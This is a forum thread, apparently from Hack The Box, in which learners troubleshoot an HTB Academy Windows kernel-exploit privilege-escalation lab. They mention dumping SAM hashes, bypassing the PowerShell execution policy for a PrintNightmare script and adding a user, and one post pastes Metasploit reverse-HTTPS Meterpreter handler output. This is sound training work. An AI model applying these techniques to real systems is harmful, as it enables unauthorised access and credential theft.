HTB Academy: Windows Privilege Escalation Kernel Exploits

Hi, I am not sure what is going on on this section Kernel Exploits in Windows Privilege Escalation.
I can obtain the hashes from SAM database, though can’t crack it with hashcat nor john
But I can’t use the PS1 script for Print Nightmare, Windows is not allowing loading the PS script
and I am not able to get a metarpreter shell as explained. I receive a callback from machine, but no session is opened.
Any clues or directions?
Cheers

It seems the VM were already exploited. I did a quick check and I’ve found the user hacker.
But I was unable to load the PS script as it says the execution script has been disabled and the dumped hashed were not possible to decode them.

I got my flag as I managed to create a new user after bypass PS policy, but the meterpreter session didnt work. anybody faced the message below?
ayload options (windows/x64/meterpreter/reverse_https):

Name Current Setting Required Description


EXITFUNC process yes Exit technique (Accepted: ‘’, seh, thread, process, none)
LHOST 10.10.x.xx yes The local listener hostname
LPORT 80 yes The local listener port
LURI no The HTTP Path

Exploit target:

Id Name


0 Wildcard Target

msf6 exploit(multi/handler) > run

[] Started HTTPS reverse handler on https://10.10.xx.xx:80
[
] https://10.10.X.X:80 handling request from 10.129.43.13; (UUID: g7a8ehsz) Staging x64 payload (201308 bytes) …
[-] Failed to load extension: No response was received to the core_loadlib request.
[*] Meterpreter session 1 opened (10.10.X.X:80 → 127.0.0.1 ) at 2022-01-04 14:54:40 +1100